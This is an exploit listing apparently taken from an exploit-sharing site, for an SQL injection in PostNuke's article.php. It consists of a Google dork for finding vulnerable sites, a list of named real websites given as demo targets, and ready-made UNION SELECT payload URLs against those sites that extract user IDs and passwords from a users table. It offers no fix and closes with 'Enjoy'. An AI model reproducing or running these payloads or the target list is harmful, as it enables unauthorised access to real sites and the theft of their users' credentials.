PostNuke(article.php) Sql-i Vulnerability

2011-08-07T00:00:00
ID 1337DAY-ID-16621
Type zdt
Reporter Angel Injection
Modified 2011-08-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title:PostNuke(article.php) Sql-i Vulnerability
# Date: 22/7/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail[Dot]com
# Vendor or Software Link: http://www.postnuke.com/
# Version: N/A
# Category:: webapps
# Google dork: intext:"Powered by DP - a customized version of PostNuke" inurl:article.php?sid=
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Demo Sites
http://www.museumnord.no/article.php?sid=1%27
http://www.ofoten.museum.no/article.php?sid=1%27
http://www.vsklubb.org/article.php?sid=1%27
http://www.melbu.gs.nl.no/article.php?sid=1%27
http://www.bluesinvest.com/article.php?sid=1%27
http://kristent-nettverk.no/article.php?sid=1%27
http://www.melbusystems.no/article.php?sid=1%27
http://www.opus-hadsel.no/kftrondheim/article.php?sid=1%27
http://www.marecom.no/article.php?sid=1%27
http://www.gulstad.no/article.php?sid=1%27
http://www.melbu.gs.nl.no/article.php?sid=1%27
http://dvl.no/article.php?sid=1%27

Exploit
http://target/article.php?sid=1'

demo
http://www.museumnord.no/article.php?sid=1+union+select+1,2,3,concat(id,0x3a,passord),5,6,7,8,9,10,11+from+brukere
http://www.gulstad.no/article.php?sid=1+union+select+1,2,3,concat%28id,0x3a,passord%29,5,6,7,8,9,10,11+from+brukere
http://www.melbu.gs.nl.no/article.php?sid=1+union+select+1,2,3,concat%28id,0x3a,passord%29,5,6,7,8,9,10,11+from+brukere
http://www.krinet.no/article.php?sid=1+union+select+1,2,3,concat%28id,0x3a,passord%29,5,6,7,8,9,10,11+from+brukere
http://www.krinet.no/article.php?sid=1%27



Enjoy
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team



#  0day.today [2018-01-05]  #